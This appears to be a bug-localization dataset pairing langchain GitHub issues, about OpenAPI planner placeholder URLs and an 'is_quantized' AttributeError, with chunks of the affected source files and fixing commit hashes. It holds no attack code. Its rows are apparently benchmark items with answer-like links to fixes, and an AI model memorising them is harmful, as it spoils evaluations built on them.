return agent.run(plan_str)
return Tool(
name=API_CONTROLLER_TOOL_NAME,
func=_create_and_run_api_controller_agent,
description=API_CONTROLLER_TOOL_DESCRIPTION,
)
def create_openapi_agent( |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | api_spec: ReducedOpenAPISpec,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
shared_memory: Optional[ReadOnlySharedMemory] = None,
callback_manager: Optional[BaseCallbackManager] = None,
verbose: bool = True,
agent_executor_kwargs: Optional[Dict[str, Any]] = None,
**kwargs: Dict[str, Any],
) -> AgentExecutor:
"""Instantiate OpenAI API planner and controller for a given spec.
Inject credentials via requests_wrapper.
We use a top-level "orchestrator" agent to invoke the planner and controller, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 2,938 | Allow OpenAPI planner to respect URLs with placeholders | In OpenAPI documentation, an endpoint might include a placeholder for a parameter:
```
GET /states/{abbr}
```
Currently, exact matches are needed with OpenAPI Planner to retrieve documentation. In the example above, `GET /states/FL` would receive a `ValueError(f"{endpoint_name} endpoint does not exist.")`.
| https://github.com/langchain-ai/langchain/issues/2938 | https://github.com/langchain-ai/langchain/pull/2940 | e42a576cb2973e36f310e1db45d75b8fa5ba9cf6 | 48cf9783913077fdad7c26752c7a70b20b57fb30 | "2023-04-15T13:54:15Z" | python | "2023-10-12T23:20:32Z" | libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py | rather than a top-level planner
that invokes a controller with its plan. This is to keep the planner simple.
"""
tools = [
_create_api_planner_tool(api_spec, llm),
_create_api_controller_tool(api_spec, requests_wrapper, llm),
]
prompt = PromptTemplate(
template=API_ORCHESTRATOR_PROMPT,
input_variables=["input", "agent_scratchpad"],
partial_variables={
"tool_names": ", ".join([tool.name for tool in tools]),
"tool_descriptions": "\n".join(
[f"{tool.name}: {tool.description}" for tool in tools]
),
},
)
agent = ZeroShotAgent(
llm_chain=LLMChain(llm=llm, prompt=prompt, memory=shared_memory),
allowed_tools=[tool.name for tool in tools],
**kwargs,
)
return AgentExecutor.from_agent_and_tools(
agent=agent,
tools=tools,
callback_manager=callback_manager,
verbose=verbose,
**(agent_executor_kwargs or {}),
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | from __future__ import annotations
import importlib.util
import logging
from typing import Any, List, Mapping, Optional
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import BaseLLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra
from langchain.schema import Generation, LLMResult
DEFAULT_MODEL_ID = "gpt2"
DEFAULT_TASK = "text-generation"
VALID_TASKS = ("text2text-generation", "text-generation", "summarization")
DEFAULT_BATCH_SIZE = 4
logger = logging.getLogger(__name__)
class HuggingFacePipeline(BaseLLM): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | """HuggingFace Pipeline API.
To use, you should have the ``transformers`` python package installed.
Only supports `text-generation`, `text2text-generation` and `summarization` for now.
Example using from_model_id:
.. code-block:: python
from langchain.llms import HuggingFacePipeline
hf = HuggingFacePipeline.from_model_id(
model_id="gpt2",
task="text-generation",
pipeline_kwargs={"max_new_tokens": 10},
)
Example passing pipeline in directly:
.. code-block:: python
from langchain.llms import HuggingFacePipeline
from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline
model_id = "gpt2"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id)
pipe = pipeline(
"text-generation", model=model, tokenizer=tokenizer, max_new_tokens=10 |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | )
hf = HuggingFacePipeline(pipeline=pipe)
"""
pipeline: Any
model_id: str = DEFAULT_MODEL_ID
"""Model name to use."""
model_kwargs: Optional[dict] = None
"""Keyword arguments passed to the model."""
pipeline_kwargs: Optional[dict] = None
"""Keyword arguments passed to the pipeline."""
batch_size: int = DEFAULT_BATCH_SIZE
"""Batch size to use when passing multiple documents to generate."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@classmethod
def from_model_id(
cls,
model_id: str,
task: str,
device: Optional[int] = -1,
model_kwargs: Optional[dict] = None,
pipeline_kwargs: Optional[dict] = None,
batch_size: int = DEFAULT_BATCH_SIZE,
**kwargs: Any,
) -> HuggingFacePipeline:
"""Construct the pipeline object from model_id and task."""
try:
from transformers import (
AutoModelForCausalLM, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | AutoModelForSeq2SeqLM,
AutoTokenizer,
)
from transformers import pipeline as hf_pipeline
except ImportError:
raise ValueError(
"Could not import transformers python package. "
"Please install it with `pip install transformers`."
)
_model_kwargs = model_kwargs or {}
tokenizer = AutoTokenizer.from_pretrained(model_id, **_model_kwargs)
try:
if task == "text-generation":
model = AutoModelForCausalLM.from_pretrained(model_id, **_model_kwargs)
elif task in ("text2text-generation", "summarization"):
model = AutoModelForSeq2SeqLM.from_pretrained(model_id, **_model_kwargs)
else:
raise ValueError(
f"Got invalid task {task}, "
f"currently only {VALID_TASKS} are supported"
)
except ImportError as e:
raise ValueError(
f"Could not load the {task} model due to missing dependencies."
) from e
if (
model.is_quantized
or model.model.is_loaded_in_4bit
or model.model.is_loaded_in_8bit
) and device is not None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | logger.warning(
f"Setting the `device` argument to None from {device} to avoid "
"the error caused by attempting to move the model that was already "
"loaded on the GPU using the Accelerate module to the same or "
"another device."
)
device = None
if device is not None and importlib.util.find_spec("torch") is not None:
import torch
cuda_device_count = torch.cuda.device_count()
if device < -1 or (device >= cuda_device_count):
raise ValueError(
f"Got device=={device}, "
f"device is required to be within [-1, {cuda_device_count})"
)
if device < 0 and cuda_device_count > 0:
logger.warning(
"Device has %d GPUs available. "
"Provide device={deviceId} to `from_model_id` to use available"
"GPUs for execution. deviceId is -1 (default) for CPU and "
"can be a positive integer associated with CUDA device id.",
cuda_device_count,
)
if "trust_remote_code" in _model_kwargs:
_model_kwargs = {
k: v for k, v in _model_kwargs.items() if k != "trust_remote_code"
}
_pipeline_kwargs = pipeline_kwargs or {}
pipeline = hf_pipeline(
task=task, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | model=model,
tokenizer=tokenizer,
device=device,
batch_size=batch_size,
model_kwargs=_model_kwargs,
**_pipeline_kwargs,
)
if pipeline.task not in VALID_TASKS:
raise ValueError(
f"Got invalid task {pipeline.task}, "
f"currently only {VALID_TASKS} are supported"
)
return cls(
pipeline=pipeline,
model_id=model_id,
model_kwargs=_model_kwargs,
pipeline_kwargs=_pipeline_kwargs,
batch_size=batch_size,
**kwargs,
)
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {
"model_id": self.model_id,
"model_kwargs": self.model_kwargs,
"pipeline_kwargs": self.pipeline_kwargs,
}
@property
def _llm_type(self) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | return "huggingface_pipeline"
def _generate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
text_generations: List[str] = []
for i in range(0, len(prompts), self.batch_size):
batch_prompts = prompts[i : i + self.batch_size]
responses = self.pipeline(batch_prompts)
for j, response in enumerate(responses):
if isinstance(response, list):
response = response[0]
if self.pipeline.task == "text-generation":
try:
from transformers.pipelines.text_generation import ReturnType
remove_prompt = (
self.pipeline._postprocess_params.get("return_type") |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
